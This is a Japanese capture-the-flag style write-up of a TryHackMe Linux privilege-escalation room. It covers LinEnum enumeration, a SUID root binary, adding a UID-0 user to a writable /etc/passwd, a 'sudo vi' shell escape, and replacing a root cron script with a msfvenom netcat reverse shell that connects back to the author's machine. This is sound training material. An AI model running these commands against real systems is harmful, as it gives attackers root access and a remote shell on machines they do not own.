TryHackMeの、多分一番かんたんな特権昇格のルーム。
昇格にいつも苦戦するので復習も兼ねてWriteupにまとめます。
ネタバレ防止の為答えはなるべく直接書かないようにしてます。
もくじ
Task4 Enumeration
LinEnumを使う
有用なツールだからどっかに保管しておけと書いてあるので従ってる(けどすぐ忘れて毎回ダウンロードしてしまう)
LinEnumを使って探索する
まず書かれているIDとパスワードでssh接続
nmz@kali:~$ ssh user3@10.10.139.78
user3@polobox:~$ローカルマシンのLinEnumのおいてあるディレクトリでWEBサーバ起動
nmz@kali:~/work/LinEnum$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...ターゲットマシンの方でwgetでLinEnumをダウンロードして実行。あとからも参照しやすいようにoutput.txtに結果を保存しておく。
user3@polobox:~$ wget 10.4.20.231:8000/LinEnum.sh
--2020-11-27 05:58:29-- http://10.4.20.231:8000/LinEnum.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’
LinEnum.sh 100%[==================================>] 45.54K 56.5KB/s in 0.8s
2020-11-27 05:58:31 (56.5 KB/s) - ‘LinEnum.sh’ saved [46631/46631]
user3@polobox:~$ chmod +x LinEnum.sh
user3@polobox:~$ ./LinEnum.sh |tee output.txtLinEnumの結果を読む
ユーザーの数を確認する
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:103:105::/var/lib/geoclue:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
user2:x:1001:1001:user2,,,:/home/user2:/bin/bash
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user4:x:1003:1003:user4,,,:/home/user4:/bin/bash
statd:x:120:65534::/var/lib/nfs:/usr/sbin/nologin
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
user6:x:1005:1005:user6,,,:/home/user6:/bin/bash
mysql:x:121:131:MySQL Server,,,:/var/mysql:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
user8:x:1007:1007:user8,,,:/home/user8:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
利用可能なshellの確認
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbashcronの確認
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/autoscript.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#読めるファイル
[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadowTask5 Abusing SUID/GUID Files
SUID/GUIDファイルを使ったエクスプロイト
user3のホームディレクトリを見る
shellってのがが赤くなってて目立つ
user3@polobox:~$ ls -l
total 180
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Desktop
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Documents
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Downloads
-rwxrwxr-x 1 user3 user3 46631 Nov 27 05:46 LinEnum.sh
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Music
-rw-rw-r-- 1 user3 user3 89918 Nov 27 06:01 output.txt
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Pictures
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Public
-rwsr-xr-x 1 root root 8392 Jun 4 2019 shell
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Templates
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Videosshellを実行するとrootになる
Congratulations! とか言われてもなんの達成感もないけど…
Task6 Exploiting Writeable /etc/passwd
/etc/passwdのエクスプロイト
user7はrootグループのメンバーなのでuser7は/etc/passwdを編集可能らしいということがわかっている前提。
新しくユーザーを追加
opensslコマンドでパスワードハッシュを生成する
user7@polobox:/home/user3$ openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1/etc/passwodの最終行にnewユーザーを書き込む
nano /etc/passwd
...
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bashCtrl+xで保存してnewユーザーとしてログイン
Task7 Escaping Vi Editor
vi使って権限昇格
user8に変更してsudoの確認
user8@polobox:/home/user7$ sudo -l
Matching Defaults entries for user8 on polobox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/visudo viがパスワードなしで使えることがわかる
user8@polobox:/home/user7$ sudo viviを開いてその画面で
:!shと入力すると戻った画面でrootになってる。すごい。
Task8 Exploiting Crontab
cronで動いているautoscript.shを使う
msfvenomの利用
# ヘルプをみる
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
# シェルをつくる
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -p cmd/unix/reverse_netcat lhost=10.4.20.231 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 89 bytes
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk
# msfvenomでできたスクリクトをechoでファイルにする
nmz@kali:~/THM/CommonLinuxPrivesc$ echo 'mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk' > autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ ls
autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk作ったファイルを配置
LinEnumのときと同じような手順でターゲットマシンに転送する
user4@polobox:~/Desktop$ cp autoscript.sh bk_autoscript.sh
user4@polobox:~/Desktop$ ls
autoscript.sh computer.desktop network.desktop settings.desktop
bk_autoscript.sh helpmanual.desktop recyclebin.desktop userfiles.desktop
user4@polobox:~/Desktop$ wget 10.4.20.231:8000/autoscript.sh
--2020-11-29 22:12:02-- http://10.4.20.231:8000/autoscript.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90 [text/x-sh]
Saving to: ‘autoscript.sh.1’
autoscript.sh.1 100%[===================>] 90 --.-KB/s in 0s
2020-11-29 22:12:03 (13.6 MB/s) - ‘autoscript.sh.1’ saved [90/90]
user4@polobox:~/Desktop$ ls
autoscript.sh computer.desktop recyclebin.desktop
autoscript.sh.1 helpmanual.desktop settings.desktop
bk_autoscript.sh network.desktop userfiles.desktop
user4@polobox:~/Desktop$ rm autoscript.sh
user4@polobox:~/Desktop$ cp autoscript.sh.1 autoscript.sh
user4@polobox:~/Desktop$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflkそしてローカル側でncを起動して5分に1回動いてくるcronを待つ
nmz@kali:~/THM/CommonLinuxPrivesc$ nc -lvp 8888
listening on [any] 8888 ...
10.10.223.125: inverse host lookup failed: Unknown host
connect to [10.4.20.231] from (UNKNOWN) [10.10.223.125] 46966
whoami
root初回に試した時には、待てど暮らせどシェルがとれなかったのですがやり直したらうまくいきました。(原因不明)
もし失敗して困ってる人がいたら何回か試すといいのかもしれない。
